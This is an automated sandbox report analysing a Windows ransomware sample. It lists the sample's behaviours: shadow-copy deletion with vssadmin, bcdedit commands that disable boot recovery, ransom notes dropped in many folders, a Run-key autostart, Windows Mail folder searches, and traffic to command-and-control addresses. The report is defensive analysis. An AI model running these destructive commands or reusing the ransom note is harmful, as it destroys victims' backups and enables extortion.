Analysis Report

Overview

General Information

Joe Sandbox Version: 14.0.0
Analysis ID: 125244
Start time: 12:12:31
Joe Sandbox Product: Cloud
Start date: 12/05/2016
Overall analysis duration: 0h 9m 3s
Report type: full
Sample file name: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
Cookbook file name: default.jbs
Analysis system description: Windows 7 (Office 2003 SP1, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 41, Firefox 36)
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Detection: MAL
Classification: mal76.evad.rans.phis.spyw.troj.winEXE@20/232@15/6
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 81
  • Number of non-executed functions: 69
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 31.1% (good quality ratio 26.7%)
  • Quality average: 66.7%
  • Quality standard deviation: 35.8%
Cookbook Comments:
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): mscorsvw.exe, sppsvc.exe, VSSVC.exe, WmiApSrv.exe, conhost.exe, WMIADAP.exe, dllhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.


Detection

Strategy    Score   Range     Reporting        Detection
Threshold   76      0 - 100   Report FP / FN   malicious


Classification categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader (scale: clean, suspicious, malicious)

Analysis Advice

Sample drops PE files which have not been started; submit the dropped PE samples to Joe Sandbox for a secondary analysis.
Sample sleeps for a long time; analyze it with the fake sleep cookbook.



Signature Overview



Spam, unwanted Advertisements and Ransom Demands:

Deletes shadow drive data (may be related to ransomware)
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Binary or memory string: fwindir%s\system32\cmd.exe/c start "" ""runasvssadmin.exe delete shadows /all /Quiet openrunas234058000Shell32.dllKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\recover_file_.txt:Zone.IdentifierSeDebugPrivilege12393578327533451bcdedit.exe /set {current} bootems offbcdedit.exe /set {current} advancedoptions offbcdedit.exe /set {current} optionsedit offbcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailuresbcdedit.exe /set {current} recoveryenabled offw+%s
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Process created: C:\Windows\System32\vssadmin.exe C:\Windows\System32\vssadmin.exe delete shadows /all /Quiet
Source: amhfnhe45.exe | Binary or memory string: fwindir%s\system32\cmd.exe/c start "" ""runasvssadmin.exe delete shadows /all /Quiet openrunas234058000Shell32.dllKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\recover_file_.txt:Zone.IdentifierSeDebugPrivilege12393578327533451bcdedit.exe /set {current} bootems offbcdedit.exe /set {current} advancedoptions offbcdedit.exe /set {current} optionsedit offbcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailuresbcdedit.exe /set {current} recoveryenabled offw+%s
Source: vssadmin.exe | Binary or memory string: "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
Source: vssadmin.exe | Binary or memory string: C:\C:\Windows\System32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet C:\Windows\System32\vssadmin.exeWinsta0\Default
Source: vssadmin.exe | Binary or memory string: oF oF0oF:oFC:\Windows\System32\vssadmin.exedeleteshadows/all/Quiet
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete ShadowStorage
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
Source: vssadmin.exe | Binary or memory string: vssadmin Delete Shadows
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
Source: vssadmin.exe | Binary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
Writes a notice file (html or txt) to demand a ransom
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | File dropped: C:\$Recycle.Bin\S-1-5-21-312302014-279660585-3511680526-1001\help_recover_instructions+uuk.txt -> __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! not your language? use https://translate.google.com what happened to your files ?all of your files were protected by a strong encryption with rsa-4096.more information about the encryption keys using rsa-4096 can be found here: http://en.wikipedia.org/wiki/rsa_(cryptosystem)how did this happen ?!!! specially for your pc was generated personal rsa-4096 key, both public and private.!!! all your files were encrypted with the public key, which has been transferred to your computer via the internet.decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?so, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining btc now, and restore your data easy way.if you have really
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | File dropped: C:\$Recycle.Bin\S-1-5-21-312302014-279660585-3511680526-1001\help_recover_instructions+uuk.html -> <html><!-- 72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33ccff;"> <!--72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234-72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> <center><div style="text-align:left; font-family:arial; <!------72839457293459235419457293679234769237459375984375934875342759327593247592347592375923459234 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#f4f4f4; padding:20px; border-style:solid; border-width:5px; border-color:#bababa;"><b><font class="ttl"><center><b>not your language? use <a href="https://translate.google.com" ta
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | File dropped: C:\$Recycle.Bin\help_recover_instructions+uuk.txt -> (same ransom note text as the .txt note above)
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | File dropped: C:\$Recycle.Bin\help_recover_instructions+uuk.html -> (same ransom note HTML as the .html note above)
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | File dropped: C:\Users\admin\AppData\Local\Adobe\Acrobat\11.0\Cache\help_recover_instructions+uuk.txt -> (same ransom note text as the .txt note above)
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | File dropped: C:\Users\admin\AppData\Local\Adobe\Acrobat\11.0\Cache\help_recover_instructions+uuk.html -> (same ransom note HTML as the .html note above)
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | File dropped: C:\Users\admin\AppData\Local\Adobe\Acrobat\11.0\help_recover_instructions+uuk.txt -> (same ransom note text as the .txt note above)
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | File dropped: C:\Users\admin\AppData\Local\Adobe\Acrobat\11.0\help_recover_instructions+uuk.html -> (same ransom note HTML as the .html note above)
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | File dropped: C:\Users\admin\AppData\Local\Adobe\Acrobat\9.0\Cache\help_recover_instructions+uuk.txt -> (same ransom note text as the .txt note above)
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | File dropped: C:\Users\admin\AppData\Local\Adobe\Acrobat\9.0\Cache\help_recover_instructions+uuk.html -> (same ransom note HTML as the .html note above)

Networking:

Urls found in memory or binary data
Contains functionality to download additional files from the internet
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Code function: 1_2_0041BB40 InternetReadFile,1_2_0041BB40
Downloads files
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | File created: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OKZXCG0M\76HMLWKC.txt
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko Host: ip.tyk.nu
Found strings which match to known social media urls
Source: amhfnhe45.exe | String found in binary or memory: yahoo.com equals www.yahoo.com (Yahoo)
Source: amhfnhe45.exe | String found in binary or memory: yahoo.com/ equals www.yahoo.com (Yahoo)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: ip.tyk.nu
Posts data to webserver
Source: unknown | HTTP traffic detected: POST /components/com_mailto/views/dbinfo.php HTTP/1.1 Accept: y6 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko Host: topdrivers.org Content-Length: 741 Cache-Control: no-cache Data Raw: (hex dump of the 741-byte POST body omitted)
Tries to download non-existing http data (HTTP/1.1 404 Not Found)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 12 May 2016 10:14:19 GMT Server: Apache Content-Length: 236 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: DYNSRV=lin238; path=/ Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><bod
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko Host: ip.tyk.nu

Boot Survival:

Creates an autostart registry key
Source: C:\Windows\System32\reg.exe | Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run game342

Stealing of Sensitive Information:

Searches for Windows Mail specific files
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail *
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup unknown
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Backup\new unknown
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Directory queried: C:\Users\admin\AppData\Local\Microsoft\Windows Mail\Stationery unknown
Sends process data via the network to a C&C
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Network send: 144.76.253.225 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Network send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exeNetwork send: 185.24.99.98 80

Persistence and Installation Behavior:

Drops PE files
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | File created: C:\Users\admin\AppData\Roaming\amhfnhe45.exe
May use bcdedit to modify the Windows boot settings
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Binary or memory string: bcdedit.exe /set {current} optionsedit off
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Binary or memory string: bcdedit.exe /set {current} recoveryenabled off
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Binary or memory string: bcdedit.exe /set {current} advancedoptions off
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Binary or memory string: bcdedit.exe /set {current} bootems off
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Binary or memory string: bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Binary or memory string: fwindir%s\system32\cmd.exe/c start "" ""runasvssadmin.exe delete shadows /all /Quiet openrunas234058000Shell32.dllKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\recover_file_.txt:Zone.IdentifierSeDebugPrivilege12393578327533451bcdedit.exe /set {current} bootems offbcdedit.exe /set {current} advancedoptions offbcdedit.exe /set {current} optionsedit offbcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailuresbcdedit.exe /set {current} recoveryenabled offw+%s
Source: amhfnhe45.exe | Binary or memory string: bcdedit.exe /set {current} optionsedit off
Source: amhfnhe45.exe | Binary or memory string: bcdedit.exe /set {current} recoveryenabled off
Source: amhfnhe45.exe | Binary or memory string: bcdedit.exe /set {current} advancedoptions off
Source: amhfnhe45.exe | Binary or memory string: bcdedit.exe /set {current} bootems off
Source: amhfnhe45.exe | Binary or memory string: bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
Source: amhfnhe45.exe | Binary or memory string: fwindir%s\system32\cmd.exe/c start "" ""runasvssadmin.exe delete shadows /all /Quiet openrunas234058000Shell32.dllKERNEL32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirection\recover_file_.txt:Zone.IdentifierSeDebugPrivilege12393578327533451bcdedit.exe /set {current} bootems offbcdedit.exe /set {current} advancedoptions offbcdedit.exe /set {current} optionsedit offbcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailuresbcdedit.exe /set {current} recoveryenabled offw+%s
Source: amhfnhe45.exe | Binary or memory string: \#bcdedit.exe
Source: bcdedit.exe | Binary or memory string: bcdedit.exe /set {current} bootems off
Source: bcdedit.exe | Binary or memory string: C:\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit.exe /set {current} bootems offC:\Windows\system32\bcdedit.exeWinsta0\Default3
Source: bcdedit.exe | Binary or memory string: bcdedit.exe /set {current} bootems off4
Source: bcdedit.exe | Binary or memory string: ^,\Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##0
Source: bcdedit.exe | Binary or memory string: >C:\Windows\system32\bcdedit.exe
Source: bcdedit.exe | Binary or memory string: bcdedit.exe
Source: bcdedit.exe | Binary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exe | Binary or memory string: bcdedit.exe/set{current}bootemsoffnLOCALAPPDATA=C:\Users\admin\AppData\LocalLOGONSERVER=\\ADMIN-PCNUMBER_OF_PROCEh
Source: bcdedit.exe | Binary or memory string: =bcdedit.exe/set{current}advancedoptionsoff:\Users\admin\AppData\LocalLOGONSERVER=\\ADMIN-PCNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C:\PrZlx)
Source: bcdedit.exe | Binary or memory string: bcdedit.exe /set {current} advancedoptions off
Source: bcdedit.exe | Binary or memory string: C:\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit.exe /set {current} advancedoptions offC:\Windows\system32\bcdedit.exeWinsta0\Default
Source: bcdedit.exe | Binary or memory string: bcdedit.exe /set {current} advancedoptions offx
Source: bcdedit.exe | Binary or memory string: \Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##
Source: bcdedit.exe | Binary or memory string: >C:\Windows\system32\bcdedit.exe
Source: bcdedit.exe | Binary or memory string: bcdedit.exe
Source: bcdedit.exe | Binary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exe | Binary or memory string: >C:\Windows\system32\bcdedit.exe
Source: bcdedit.exe | Binary or memory string: bcdedit.exe
Source: bcdedit.exe | Binary or memory string: bcdedit.exe/set{current}optionseditoffPPDATA=C:\Users\admin\AppData\LocalLOGONSERVER=\\ADMIN-PCNUMBER_OF_PROCESSORS=1OS=Windo*
Source: bcdedit.exe | Binary or memory string: bcdedit.exe /set {current} optionsedit off
Source: bcdedit.exe | Binary or memory string: C:\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit.exe /set {current} optionsedit offC:\Windows\system32\bcdedit.exeWinsta0\Default
Source: bcdedit.exe | Binary or memory string: \Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##
Source: bcdedit.exe | Binary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exe | Binary or memory string: bcdedit.exe/set{current}bootstatuspolicyIgnoreAllFailuresGONSERVER=\\ADMIN-PCNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Wi
Source: bcdedit.exe | Binary or memory string: bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
Source: bcdedit.exe | Binary or memory string: C:\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailuresC:\Windows\system32\bcdedit.exeWinsta0\Default
Source: bcdedit.exe | Binary or memory string: ^C\Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##
Source: bcdedit.exe | Binary or memory string: >C:\Windows\system32\bcdedit.exe
Source: bcdedit.exe | Binary or memory string: bcdedit.exe
Source: bcdedit.exe | Binary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exe | Binary or memory string: bcdedit.exe /set {current} recoveryenabled off
Source: bcdedit.exe | Binary or memory string: C:\C:\Windows\system32;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\system32\bcdedit.exebcdedit.exe /set {current} recoveryenabled offC:\Windows\system32\bcdedit.exeWinsta0\DefaulteBP
Source: bcdedit.exe | Binary or memory string: bcdedit.exe /set {current} recoveryenabled offbBP
Source: bcdedit.exe | Binary or memory string: \Device\HarddiskVolume2\Windows\System32\bcdedit.exe;##
Source: bcdedit.exe | Binary or memory string: Microsoft.Windows.OSLoader.BCDEdit,processorArchitecture="x86",type="win32",version="5.1.0.0"C:\Windows\system32\bcdedit.exeGsHd(
Source: bcdedit.exe | Binary or memory string: >C:\Windows\system32\bcdedit.exe
Source: bcdedit.exe | Binary or memory string: bcdedit.exe
Source: bcdedit.exe | Binary or memory string: bcdedit.exe/set{current}recoveryenabledoff:\Users\admin\AppData\LocalLOGONSERVER=\\ADMIN-PCNUMBER_OF_PROCESSORS=1OS=Windows_NTPath=C:\Pr
Uses bcdedit to modify the Windows boot settings
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootems off
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} advancedoptions off
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} optionsedit off
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {current} recoveryenabled off

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Code function: 0_2_0042D4E5 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0042D4E5
Generates new code (likely due to unpacking of malware or shellcode)
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Code execution: Found new code
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Code execution: Found new code
PE file contains an invalid checksum
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Static PE information: real checksum: 0xed005e8b should be: 0x5151d
Source: amhfnhe45.exe.2732.dr | Static PE information: real checksum: 0xed005e8b should be: 0x5151d
PE file contains sections with non-standard names
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Static PE information: section name: .data5
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Static PE information: section name: .data4
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Static PE information: section name: .data1
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Static PE information: section name: .data3
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Static PE information: section name: .data2
Source: 94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Static PE information: section name: .data6
Source: amhfnhe45.exe.2732.dr | Static PE information: section name: .data5
Source: amhfnhe45.exe.2732.dr | Static PE information: section name: .data4
Source: amhfnhe45.exe.2732.dr | Static PE information: section name: .data1
Source: amhfnhe45.exe.2732.dr | Static PE information: section name: .data3
Source: amhfnhe45.exe.2732.dr | Static PE information: section name: .data2
Source: amhfnhe45.exe.2732.dr | Static PE information: section name: .data6

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Code function: 0_2_00413AB0 FindFirstFileW,FindNextFileW,FindClose,0_2_00413AB0
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Code function: 0_1_00413AB0 FindFirstFileW,FindNextFileW,FindClose,0_1_00413AB0
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Code function: 1_2_00413AB0 FindFirstFileW,FindNextFileW,FindClose,1_2_00413AB0
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Code function: 1_1_00413AB0 FindFirstFileW,FindNextFileW,FindClose,1_1_00413AB0
Contains functionality to query local drives
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Code function: 0_2_00413840 GetLogicalDriveStringsW,GetVolumeInformationW,GetDriveTypeW,GetVolumeInformationW,ExitThread,0_2_00413840
Enumerates the file system
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | File opened: C:\Documents and Settings\admin\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | File opened: C:\Documents and Settings\admin\AppData\Local\Adobe\Acrobat\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | File opened: C:\Documents and Settings\admin\AppData\Local\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | File opened: C:\Documents and Settings\admin\AppData\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | File opened: C:\Documents and Settings\admin\AppData\Local\Adobe\Acrobat\11.0\
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | File opened: C:\Documents and Settings\admin\AppData\Local\Adobe\

System Summary:

Classification label
Source: classification engine | Classification label: mal76.evad.rans.phis.spyw.troj.winEXE@20/232@15/6
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Code function: 0_2_004201F0 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,0_2_004201F0
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Code function: 0_1_004201F0 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,0_1_004201F0
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Code function: 1_2_004201F0 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,1_2_004201F0
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Code function: 1_1_004201F0 GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,1_1_004201F0
Contains functionality to enum processes or threads
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | Code function: 1_2_0041C8F0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,1_2_0041C8F0
Contains functionality to instantiate COM classes
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | Code function: 0_2_0041F040 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,SHGetFolderPathW,SHGetFolderPathW,CoCreateInstance,ExitProcess,CoCreateInstance,ExitProcess,LoadLibraryW,LoadStringW,LoadStringW,LoadStringW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetSpecialFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,GetModuleFileNameW,DeleteFileW,LookupPrivilegeValueA,GetLastError,GetVersionExW,CreateThread,SetThreadPriority,0_2_0041F040
Creates files inside the user directory
Source: C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe | File created: C:\Users\admin\AppData\Roaming\amhfnhe45.exe
Creates temporary files
Source: C:\Users\admin\AppData\Roaming\amhfnhe45.exe | File created: C:\Documents and Settings\admin\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Low\help_recover_instructions+uuk.txt
Found command line output
Source: C:\Windows\System32\reg.exe | Console Write: ...........v..0.....T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.............N...........x...
Source: C:\Windows\System32\bcdedit.exe | Console Write: ...........v........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.............N..........w.e.w
Source: C:\Windows\System32\vssadmin.exe | Console Write: .......................................v..0..................|..............................,...............S<..........
Source: C:\Windows\System32\vssadmin.exe | Console Write: ....................N.o. .i.t.e.m.s. .f.o.u.n.d. .t.h.a.t. .s.a.t.i.s.f.y. .t.h.e. .q.u.e.r.y.......4...P...S<..........
Source: C:\Windows\System32\bcdedit.exe | Console Write: ...........v........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.............N..........w.e.w
Source: C:\Windows\System32\bcdedit.exe | Console Write: ...........vd.......T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.............N..........w.e.w
Source: C:\Windows\System32\bcdedit.exe | Console Write: ...........v..$.....T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.......$...$.N..........w.e.w
Source: C:\Windows\System32\bcdedit.exe | Console Write: ...........v........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........T...N..........w.e.w
